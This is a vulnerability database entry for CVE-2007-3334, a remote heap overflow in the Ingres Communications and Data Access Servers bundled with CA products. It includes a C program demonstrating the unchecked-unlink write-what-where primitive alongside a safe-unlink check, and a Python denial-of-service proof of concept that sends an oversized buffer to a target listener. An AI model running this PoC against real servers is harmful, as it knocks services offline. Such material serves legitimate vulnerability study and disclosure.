Ingres Database Server Communications Server and Data Access Server Components Remote Heap Overflow Vulnerability

Vulnerability ID: 1113168
Vulnerability type: Buffer overflow
Published: 2007-06-21
Updated: 2007-06-25
CVE ID: CVE-2007-3334
CNNVD ID: CNNVD-200706-357
Platform: Windows
CVSS score: 10.0
|Vulnerability source
https://www.exploit-db.com/exploits/30224
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200706-357
|Vulnerability details
Ingres is the database back end used by default in many CA products. The Ingres database server bundled with those products has a buffer overflow in its handling of request data, and a remote attacker could exploit it to take control of the server.

The Ingres Communications Server process (iigcc) listens on TCP port 21064 by default. If an attacker connects to this port and sends two specially crafted forms within a short interval, iigcc calls the QUremove function with attacker-controlled arguments; QUremove then writes to an attacker-controlled address, which gives the attacker full control of execution flow. If crafted forms are instead sent to the port repeatedly with a pause between packets, iigcc calls the QUinsert function, which performs memory operations through an attacker-controlled address and likewise allows control of execution flow.
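Both code paths described above, QUremove reached with attacker-controlled arguments and QUinsert reached with an attacker-controlled address, are the classic unchecked unlink and insert on a doubly linked queue. The following C program is an added example and is not Ingres's QU code or anything taken from the advisory; the QUEUE layout (q_next first, then q_prev) and the names qu_remove, qu_insert, where and what are assumptions made for illustration. It shows the legitimate operations, the write-what-where that an unchecked unlink hands to whoever controls an element's neighbour pointers, the reciprocal write that constrains the "what" to writable memory, and the safe-unlink check that refuses a forged element.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

/*
 * Illustrative model of the unlink/insert primitive behind the QUremove and
 * QUinsert findings. Added example code, not Ingres's QU implementation; the
 * layout below (q_next, then q_prev) is an assumed generic doubly linked queue.
 */
typedef struct queue {
    struct queue *q_next;
    struct queue *q_prev;
} QUEUE;

/* Unchecked unlink: trusts both neighbour pointers stored in the element. */
static void qu_remove(QUEUE *q)
{
    q->q_prev->q_next = q->q_next;   /* write 1: *(q_prev + 0)             = q_next */
    q->q_next->q_prev = q->q_prev;   /* write 2: *(q_next + sizeof(void *)) = q_prev */
}

/* Unchecked insert of q after pos: the writes are driven by pointers read from pos. */
static void qu_insert(QUEUE *q, QUEUE *pos)
{
    q->q_next = pos->q_next;
    q->q_prev = pos;
    pos->q_next->q_prev = q;         /* writes the address of q wherever pos->q_next points */
    pos->q_next = q;
}

/* Hardened unlink ("safe unlinking"): refuse an element whose neighbours do not
 * point back at it. Returns 1 if unlinked, 0 if the element was rejected. */
static int qu_remove_checked(QUEUE *q)
{
    if (q->q_prev->q_next != q || q->q_next->q_prev != q)
        return 0;
    qu_remove(q);
    return 1;
}

/* Normal use: a circular list anchored at head; insert a and b, then remove a.
 * Returns 1 when the list looks as expected after every step. */
static int demo_normal_queue(void)
{
    QUEUE head, a, b;
    head.q_next = head.q_prev = &head;
    qu_insert(&a, &head);            /* head <-> a */
    qu_insert(&b, &a);               /* head <-> a <-> b */
    if (head.q_next != &a || a.q_next != &b || b.q_next != &head)
        return 0;
    if (!qu_remove_checked(&a))
        return 0;
    return head.q_next == &b && b.q_prev == &head;
}

/* Stand-ins for the memory an attacker wants to hit. `where` plays the role of
 * a slot holding a pointer (a function pointer or vtable entry in a real target);
 * `what` is writable memory the attacker also controls, such as a heap buffer
 * holding a fake object. Both are file-scope so a harness can inspect them. */
static QUEUE where;
static QUEUE what;

/* Forged element: with q_next = &what and q_prev = &where, the unchecked unlink
 * stores &what into where.q_next (the chosen slot) and, as the price, stores
 * &where into what.q_prev. Returns 1 when both writes landed as predicted. */
static int demo_attacker_unlink(void)
{
    QUEUE *node = malloc(sizeof *node);
    if (!node)
        return 0;
    where.q_next = where.q_prev = NULL;
    what.q_next = what.q_prev = NULL;

    node->q_next = &what;            /* "what": the value that gets written */
    node->q_prev = &where;           /* "where": target slot minus offsetof(QUEUE, q_next) */
    qu_remove(node);                 /* no validation, so both writes happen */
    free(node);

    return where.q_next == &what && what.q_prev == &where;
}

/* The same forged element is rejected by the checked variant: neither neighbour
 * points back at it, so nothing is written. Returns 1 on rejection with both
 * targets untouched. */
static int demo_checked_unlink_rejects(void)
{
    QUEUE node;
    where.q_next = where.q_prev = NULL;
    what.q_next = what.q_prev = NULL;
    node.q_next = &what;
    node.q_prev = &where;
    int unlinked = qu_remove_checked(&node);
    return !unlinked && where.q_next == NULL && what.q_prev == NULL;
}

int main(void)
{
    printf("normal queue ops: %s\n", demo_normal_queue() ? "ok" : "FAIL");
    printf("unchecked unlink wrote attacker value: %s\n", demo_attacker_unlink() ? "yes" : "no");
    printf("checked unlink rejected forged element: %s\n", demo_checked_unlink_rejects() ? "yes" : "no");
    return 0;
}
```

The second write in qu_remove is why the "what" in a real unlink attack has to be an address that is itself writable: if it pointed into code, write 2 would fault before the hijacked slot was ever used. The insert path is weaker for an attacker, since the only value it stores through the controlled pointer is the address of the element being inserted, but it still gives a write to a chosen location, which matches the description of QUinsert above.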
|Vulnerability exploit
source: http://www.securityfocus.com/bid/24585/info

Ingres Database Server included in CA eTrust Secure Content Manager is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue.

Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file.

# Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
# Date: 2010-08-14
# Author: fdisk
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE:  CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338
# Notes: Fixed in the last version.
# please let me know if you are/were able to get code execution <rr dot fdisk at gmail dot com>

#!/usr/bin/env python3
# Python 3 port of the PoC: sends one oversized request to the chosen Ingres
# listener and reports whether the service answers or drops the connection.
import socket
import sys

if len(sys.argv) != 4:
    print("Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>")
    print("Vulnerable Services: iigcc, iijdbc")
    sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])
service = sys.argv[3]

# Request body length per service; these are the lengths the PoC author found
# sufficient to overrun the buffer in each listener (iigcc is the Communications
# Server, listening on TCP 21064 by default; iijdbc is the Data Access Server).
if service == "iigcc":
    payload = b"\x41" * 2106
elif service == "iijdbc":
    payload = b"\x41" * 1066
else:
    print("Vulnerable Services: iigcc, iijdbc")
    sys.exit(1)

# Four marker bytes that land past the end of the overrun buffer
payload += b"\x42" * 4

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)
s.connect((host, port))
print("Sending payload")
s.sendall(payload)
try:
    data = s.recv(1024)
    print("Received", repr(data))
except (socket.timeout, ConnectionResetError, ConnectionAbortedError) as exc:
    # No reply or a reset is the expected sign that the listener died
    print("No reply:", exc)
finally:
    s.close()

print(service + " crashed")
|References

Source: IDEFENSE
Name: 20070621 Ingres Database Multiple Heap Corruption Vulnerabilities
Link: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546
Source: XF
Name: ingres-wakeup-privilege-escalation(35002)
Link: http://xforce.iss.net/xforce/xfdb/35002
Source: XF
Name: ingres-data-access-server-bo(34992)
Link: http://xforce.iss.net/xforce/xfdb/34992
Source: XF
Name: ingres-communications-server-bo(34991)
Link: http://xforce.iss.net/xforce/xfdb/34991
Source: SECTRACK
Name: 1018278
Link: http://www.securitytracker.com/id?1018278
Source: BID
Name: 24585
Link: http://www.securityfocus.com/bid/24585
Source: VUPEN
Name: ADV-2007-2290
Link: http://www.frsirt.com/english/advisories/2007/2290
Source: VUPEN
Name: ADV-2007-2288
Link: http://www.frsirt.com/english/advisories/2007/2288
Source: www.ca.com
Link: http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778
Source: supportconnectw.ca.com
Link: http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp
Source: SECUNIA
Name: 25775
Link: http://secunia.com/advisories/25775
Source: SECUNIA
Name: 25756
Link: http://secunia